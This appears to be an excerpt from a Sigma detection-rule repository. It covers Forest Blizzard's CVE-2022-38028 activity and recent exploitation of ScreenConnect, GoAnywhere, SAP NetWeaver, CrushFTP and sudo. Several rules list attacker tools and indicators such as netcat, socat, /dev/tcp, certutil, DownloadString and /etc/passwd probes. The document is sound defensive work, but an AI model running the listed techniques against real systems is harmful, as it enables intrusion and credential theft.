    "content": "# Forest Blizzard’s Exploiting CVE-2022-38028\n\n## Summary\n\nMicrosoft Threat Intelligence published results of their longstanding investigation into activity by the Russian-based threat actor Forest Blizzard (STRONTIUM) using a custom tool to elevate privileges and steal credentials in compromised networks. Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions. \n\nYou can find more information on the threat in the following articles:\n\n- [Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials](https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/)\n\n## Rules\n\n- [Forest Blizzard APT - File Creation Activity](./file_event_win_apt_forest_blizzard_activity.yml)\n- [Forest Blizzard APT - JavaScript Constrained File Creation](./file_event_win_apt_forest_blizzard_constrained_js.yml)\n- [Forest Blizzard APT - Process Creation Activity](./proc_creation_win_apt_forest_blizzard_activity.yml)\n- [Forest Blizzard APT - Custom Protocol Handler DLL Registry Set](./registry_set_apt_forest_blizzard_custom_protocol_handler.yml)\n- [Forest Blizzard APT - Custom Protocol Handler Creation](./registry_set_apt_forest_blizzard_custom_protocol_handler_dll.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/file_event_win_apt_forest_blizzard_activity.yml",
    "content": "title: Forest Blizzard APT - File Creation Activity\nid: b92d1d19-f5c9-4ed6-bbd5-7476709dc389\nstatus: test\ndescription: |\n    Detects the creation of specific files inside of ProgramData directory.\n    These files were seen being created by Forest Blizzard as described by MSFT.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-23\nmodified: 2024-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_programdata_driver_store:\n        TargetFilename|startswith:\n            - 'C:\\ProgramData\\Microsoft\\v'\n            - 'C:\\ProgramData\\Adobe\\v'\n            - 'C:\\ProgramData\\Comms\\v'\n            - 'C:\\ProgramData\\Intel\\v'\n            - 'C:\\ProgramData\\Kaspersky Lab\\v'\n            - 'C:\\ProgramData\\Bitdefender\\v'\n            - 'C:\\ProgramData\\ESET\\v'\n            - 'C:\\ProgramData\\NVIDIA\\v'\n            - 'C:\\ProgramData\\UbiSoft\\v'\n            - 'C:\\ProgramData\\Steam\\v'\n        TargetFilename|contains:\n            - '\\prnms003.inf_'\n            - '\\prnms009.inf_'\n    selection_programdata_main:\n        TargetFilename|startswith: 'C:\\ProgramData\\'\n    selection_programdata_files_1:\n        TargetFilename|endswith:\n            - '.save'\n            - '\\doit.bat'\n            - '\\execute.bat'\n            - '\\servtask.bat'\n        # Hashes|contains: '7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9' # Uncommon this if you collect hash information inf file events\n    selection_programdata_files_2:\n        TargetFilename|contains: '\\wayzgoose'\n        TargetFilename|endswith: '.dll'\n    condition: selection_programdata_driver_store or (selection_programdata_main and 1 of selection_programdata_files_*)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/file_event_win_apt_forest_blizzard_constrained_js.yml",
    "content": "title: Forest Blizzard APT - JavaScript Constrained File Creation\nid: ec7c4e9b-9bc9-47c7-a32f-b53b598da642\nstatus: test\ndescription: |\n    Detects the creation of JavaScript files inside of the DriverStore directory.\n    Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\'\n        TargetFilename|endswith: '\\.js'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/proc_creation_win_apt_forest_blizzard_activity.yml",
    "content": "title: Forest Blizzard APT - Process Creation Activity\nid: 07db928c-8632-488e-ac7d-3db847489175\nstatus: experimental\ndescription: |\n    Detects the execution of specific processes and command line combination.\n    These were seen being created by Forest Blizzard as described by MSFT.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-23\nmodified: 2025-01-22\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_hashes:\n        Hashes|contains:\n            - 'SHA256=6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f'\n            - 'SHA256=c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5'\n    selection_schtasks_create:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - 'Create'\n            - '/RU'\n            - 'SYSTEM'\n            - '\\Microsoft\\Windows\\WinSrv'\n        CommandLine|contains:\n            - 'servtask.bat'\n            - 'execute.bat'\n            - 'doit.bat'\n    selection_schtasks_delete:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - 'Delete'\n            - '/F '\n            - '\\Microsoft\\Windows\\WinSrv'\n    selection_powershell:\n        CommandLine|contains|all:\n            - 'Get-ChildItem'\n            - '.save'\n            - 'Compress-Archive -DestinationPath C:\\ProgramData\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/registry_set_apt_forest_blizzard_custom_protocol_handler.yml",
    "content": "title: Forest Blizzard APT - Custom Protocol Handler Creation\nid: 5cdeb555-65de-4767-99fe-e26807465148\nstatus: test\ndescription: |\n    Detects the setting of a custom protocol handler with the name \"rogue\".\n    Seen being created by Forest Blizzard APT as reported by MSFT.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\PROTOCOLS\\\\Handler\\rogue\\CLSID'\n        Details: '{026CC6D7-34B2-33D5-B551-CA31EB6CE345}'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/registry_set_apt_forest_blizzard_custom_protocol_handler_dll.yml",
    "content": "title: Forest Blizzard APT - Custom Protocol Handler DLL Registry Set\nid: d807056b-0e00-4cec-b7f8-b8b7518e382b\nstatus: test\ndescription: |\n    Detects the setting of the DLL that handles the custom protocol handler.\n    Seen being created by Forest Blizzard APT as reported by MSFT.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server'\n        Details|endswith: '.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/file_event_win_apt_unknown_exploitation_indicators.yml",
    "content": "title: ScreenConnect - SlashAndGrab Exploitation Indicators\nid: 05164d17-8e11-4d7d-973e-9e4962436b87\nstatus: test\ndescription: |\n    Detects indicators of exploitation by threat actors during exploitation of the \"SlashAndGrab\" vulnerability related to ScreenConnect as reported Team Huntress\nreferences:\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\ntags:\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        - TargetFilename|contains|all:\n              - 'C:\\Windows\\Temp\\ScreenConnect\\'\n              - '\\LB3.exe'\n        - TargetFilename|contains:\n              - 'C:\\mpyutd.msi'\n              - 'C:\\perflogs\\RunSchedulerTaskOnce.ps1'\n              - 'C:\\ProgramData\\1.msi'\n              - 'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\mpyutd.msi'\n              - 'C:\\ProgramData\\update.dat'\n              - 'C:\\Users\\oldadmin\\Documents\\MilsoftConnect\\Files\\ta.exe'\n              - 'C:\\Windows\\Help\\Help\\SentinelAgentCore.dll'\n              - 'C:\\Windows\\Help\\Help\\SentinelUI.exe'\n              - 'C:\\Windows\\spsrv.exe'\n              - 'C:\\Windows\\Temp\\svchost.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-10035/proc_creation_win_exploit_cve_2025_10035.yml",
    "content": "title: Potential Exploitation of GoAnywhere MFT Vulnerability\nid: 6c76b3d0-afe4-4870-9443-ffe6773c5fef\nstatus: experimental\ndescription: |\n    Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035.\n    This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/\nauthor: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-07\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.execution\n    - attack.t1059.001\n    - attack.persistence\n    - attack.t1133\n    - detection.emerging-threats\n    - cve.2025-10035\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Detects the GoAnywhere Tomcat parent process based on path and command line arguments\n    selection_parent:\n        ParentImage|contains: '\\GoAnywhere\\tomcat\\'\n    selection_powershell_img:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n    selection_powershell_cmd:\n        - CommandLine|contains|all:\n              - 'IEX'\n              - 'enc'\n              - 'Hidden'\n              - 'bypass'\n        - CommandLine|re:\n              - 'net\\s+user'\n              - 'net\\s+group'\n              - 'query\\s+session'\n        - CommandLine|contains:\n              - 'whoami'\n              - 'systeminfo'\n              - 'dsquery'\n              - 'localgroup administrators'\n              - 'nltest'\n              - 'samaccountname='\n              - 'adscredentials'\n              - 'o365accountconfiguration'\n              - '.DownloadString('\n              - '.DownloadFile('\n              - 'FromBase64String('\n              - 'System.IO.Compression'\n              - 'System.IO.MemoryStream'\n              - 'curl'\n    selection_child_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains:\n            - 'powershell'\n            - 'whoami'\n            - 'net.exe'\n            - 'net1.exe'\n            - 'rundll32'\n            - 'quser'\n            - 'nltest'\n            - 'curl'\n    selection_child_others:\n        CommandLine|contains:\n            - 'bitsadmin'\n            - 'certutil'\n            - 'mshta'\n            - 'cscript'\n            - 'wscript'\n    condition: selection_parent and (all of selection_powershell_* or 1 of selection_child_*)\nfalsepositives:\n    - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-20333/proxy_exploit_cve_2025_20333.yml",
    "content": "title: Cisco ASA Exploitation Activity - Proxy\nid: 15697955-6a29-47ca-92e9-0e05efae3260\nstatus: experimental\ndescription: |\n    Detects suspicious requests to Cisco ASA WebVpn via proxy logs associated with CVE-2025-20333 and CVE-2025-20362 exploitation.\nreferences:\n    - https://x.com/defusedcyber/status/1971492272966598683\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-20\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2025-20333\n    - cve.2025-20362\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-stem:\n            - '/+CSCOU+/MacTunnelStart.jar'\n            - '/+CSCOL+/csvrloader64.cab'\n            - '/+CSCOL+/csvrloader.jar'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-24054/file_event_win_exploit_cve_2025_24054_library_ms.yml",
    "content": "title: Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit\nid: 5a7132c0-86db-4e6b-95c0-f0e9d7f461aa\nstatus: experimental\ndescription: |\n    Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction.\n    If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker.\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054\n    - https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/\nauthor: Gene Kazimiarovich\ndate: 2025-04-20\ntags:\n    - detection.emerging-threats\n    - attack.credential-access\n    - attack.t1187   # Forced Authentication\n    - cve.2025-24054\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.library-ms'\n        Image|endswith:\n            - '\\7z.exe'\n            - '\\winrar.exe'\n            - '\\explorer.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate Library shortcuts under %APPDATA%\\Microsoft\\Windows\\Libraries\\ (rarely created by end-users)\n    - Custom corporate scripts that programmatically generate .library-ms Files\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-30406/proc_creation_win_exploit_cve_2025_30406_centrestack_portal_child_process.yml",
    "content": "title: Suspicious Process Spawned by CentreStack Portal AppPool\nid: 2d79e371-2a27-42de-87a4-b4213fc72a6a\nstatus: experimental\ndescription: |\n    Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406)\nreferences:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-30406\n    - https://blackpointcyber.com/blog/racing-to-exploit-centrestacks-cve-2025-30406/\n    - https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf\n    - https://www.bleepingcomputer.com/news/security/centrestack-rce-exploited-as-zero-day-to-breach-file-sharing-servers/\nauthor: Jason Rathbun (Blackpoint Cyber)\ndate: 2025-04-17\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.t1059.003\n    - attack.t1505.003\n    - cve.2025-30406\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\w3wp.exe'\n        ParentCommandLine|contains: '\\portal\\portal.config'\n        Image|endswith: '\\cmd.exe'\n    condition: selection\nfalsepositives:\n    - Potentially if other portal services run on w3wp with a apppool\\portal\\portal.config, if you want to increase scope you could add user IIS APPPOOL\\portal.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31161/proc_creation_win_crushftp_susp_child_processes.yml",
    "content": "title: Suspicious CrushFTP Child Process\nid: 459628e3-1b00-4e9b-9e5b-7da8961aea35\nstatus: experimental\ndescription: |\n    Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as\n    CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests.\n    The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands.\nreferences:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-2825\n    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update\n    - https://outpost24.com/blog/crushftp-auth-bypass-vulnerability/\n    - https://attackerkb.com/topics/k0EgiL9Psz/cve-2025-2825/rapid7-analysis\n    - https://projectdiscovery.io/blog/crushftp-authentication-bypass\nauthor: Craig Sweeney, Matt Anderson, Jose Oregon, Tim Kasper, Faith Stratton, Samantha Shaw, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-10\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1190\n    - cve.2025-31161\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\crushftpservice.exe'\n    selection_child:\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n            - '\\sh.exe'\n            - '\\wscript.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate CrushFTP administrative actions\n    - Software updates\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/file_event_lnx_sap_netweaver_webshell_creation.yml",
    "content": "title: Potential SAP NetWeaver Webshell Creation - Linux\nid: 5b91409c-cb18-4ab6-ac75-c5759f998409\nstatus: experimental\ndescription: |\n    Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,\n    which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.\nreferences:\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324\n    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/\n    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/\nauthor: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-28\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1059.003\n    - cve.2025-31324\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection_path:\n        TargetFilename|contains:\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/'\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/'\n    selection_ext:\n        TargetFilename|endswith:\n            - '.jsp'\n            - '.java'\n            - '.class'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate creation of jsc or java files in these locations\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/file_event_win_sap_netweaver_webshell_creation.yml",
    "content": "title: Potential SAP NetWeaver Webshell Creation\nid: 86a7c91f-98c3-4f14-a58d-d989421e1234\nstatus: experimental\ndescription: |\n    Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,\n    which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.\nreferences:\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324\n    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/\n    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/\nauthor: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-28\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1059.003\n    - cve.2025-31324\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_path:\n        TargetFilename|contains:\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work'\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root'\n    selection_ext:\n        TargetFilename|endswith:\n            - '.jsp'\n            - '.java'\n            - '.class'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate creation of jsc or java files in these locations\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/proc_creation_lnx_sap_netweaver_susp_child_process.yml",
    "content": "title: Suspicious Child Process of SAP NetWeaver - Linux\nid: 69dea60b-2deb-4c9e-a685-ad542f4367f9\nstatus: experimental\ndescription: |\n    Detects suspicious child processes spawned by SAP NetWeaver on Linux systems that could indicate potential\n    exploitation of vulnerability that allows arbitrary execution via webshells such as CVE-2025-31324.\nauthor: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-28\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1059.003\n    - cve.2025-31324\n    - detection.emerging-threats\nreferences:\n    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/\n    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_parent_img:\n        ParentImage|contains:\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work'\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root'\n    selection_current_dict:\n        CurrentDirectory|contains:\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work'\n            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root'\n    selection_child:\n        Image|endswith:\n            - '/ash'\n            - '/bash'\n            - '/csh'\n            - '/dash'\n            - '/ksh'\n            - '/sh'\n            - '/tcsh'\n            - '/zsh'\n            - '/python'\n            - '/python2'\n            - '/python3'\n            - '/perl'\n            - '/ruby'\n            - '/curl'\n            - '/wget'\n            - '/nc'\n            - '/netcat'\n            - '/ncat'\n            - '/socat'\n            - '/nmap'\n            - '/telnet'\n            - '/awk'\n            - '/sed'\n    condition: (selection_parent_img or selection_current_dict) and selection_child\nfalsepositives:\n    - Legitimate administrative activities such as software updates\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/proc_creation_win_sap_netweaver_susp_child_process.yml",
    "content": "title: Suspicious Child Process of SAP NetWeaver\nid: 5b304bcb-ac33-49d0-87af-fa1b3ca94333\nstatus: experimental\ndescription: |\n    Detects suspicious child processes spawned by SAP NetWeaver that could indicate potential\n    exploitation of vulnerability that allows arbitrary execution via webshells such as CVE-2025-31324.\nauthor: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-28\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1059.003\n    - cve.2025-31324\n    - detection.emerging-threats\nreferences:\n    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/\n    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_img:\n        ParentImage|contains:\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work'\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root'\n    selection_current_dict:\n        CurrentDirectory|contains:\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work'\n            - '\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root'\n    selection_child:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\mshta.exe'\n            - '\\certutil.exe'\n            - '\\bitsadmin.exe'\n            - '\\python.exe'\n    condition: (selection_parent_img or selection_current_dict) and selection_child\nfalsepositives:\n    - Legitimate administrative activities such as software updates\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/web_lnx_exploit_cve_2025_31324_sap_netviewer_webshell.yml",
    "content": "title: Potential SAP NetViewer Webshell Command Execution\nid: 94e12f41-6cb3-45c5-97b1-c783a7bf2e72\nstatus: experimental\ndescription: |\n    Detects potential command execution via webshell in SAP NetViewer through JSP files with cmd parameter.\n    This rule is created to detect exploitation of vulnerabilities like CVE-2025-31324, which allows remote code execution via a webshell.\nreferences:\n    - https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-14\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\n    - cve.2025-31324\nlogsource:\n    category: webserver\ndetection:\n    selection_uri:\n        cs-uri-stem|contains|all:\n            - '/irj/'\n            - '.jsp'\n    selection_query:\n        - cs-uri-query|startswith:\n              - 'cmd='\n              - 'command='\n              - 'exec_cmd='\n              - 'exec='\n        - cs-uri-query|contains:\n              - '/dev/tcp'\n              - '/etc/passwd'\n              - '%2fdev%2ftcp' # URL encoded of /dev/tcp\n              - '%2fetc%2fpasswd' # URL encoded of /etc/passwd\n              - '=uname'\n              - '=whoami'\n              - 'ifconfig'\n              - 'ping'\n              - 'pwd'\n        - cs-uri-query|contains|all:\n              - 'echo'\n              - 'base64'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate applications using cmd parameter for non-malicious purposes\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-31324/web_lnx_exploit_cve_2025_31324_sap_netviewer_webshell_uploaded.yml",
    "content": "title: Potential Java WebShell Upload in SAP NetViewer Server\nid: 639b893f-f93a-4e53-a7c8-f08cf73fe7f7\nstatus: experimental\ndescription: |\n    Detects potential Java webshell uploads via HTTP requests with Content-Type 'application/octet-stream' and Java file extensions.\n    This behavior might indicate exploitation of vulnerabilities like CVE-2025-31324, which allows remote code execution through webshells in SAP NetViewer.\nreferences:\n    - https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-14\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - detection.emerging-threats\n    - cve.2025-31324\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-content-type: 'application/octet-stream'\n        cs-method: 'POST'\n        cs-uri-stem|contains|all:\n            - '/irj/'\n            - '.jsp'\n        cs-uri-stem|endswith:\n            - '.class'\n            - '.java'\n            - '.jsp'\n    condition: selection\nfalsepositives:\n    - Legitimate uploads of Java files in development environments\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-32463/file_event_lnx_exploit_cve_2025_32463.yml",
    "content": "title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation\nid: 10ac0730-c24e-4f4c-81f8-b13a1ac95a1d\nstatus: experimental\ndescription: |\n    Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463.\n    This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations.\n    When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment,\n    potentially leading to arbitrary code execution and privilege escalation.\nreferences:\n    - https://github.com/kh4sh3i/CVE-2025-32463/blob/81bb430f84fa2089224733c3ed4bfa434c197ad4/exploit.sh\nauthor: Swachchhanda Shrawn Poudel (Nextron Systems)\ndate: 2025-10-02\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2025-32463\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: linux\ndetection:\n    selection:\n        TargetFilename|endswith: '/etc/nsswitch.conf'\n    filter_main_legitimate_path:\n        TargetFilename: '/etc/nsswitch.conf'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Backup locations\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-33053/image_load_win_exploit_cve_2025_33053.yml",
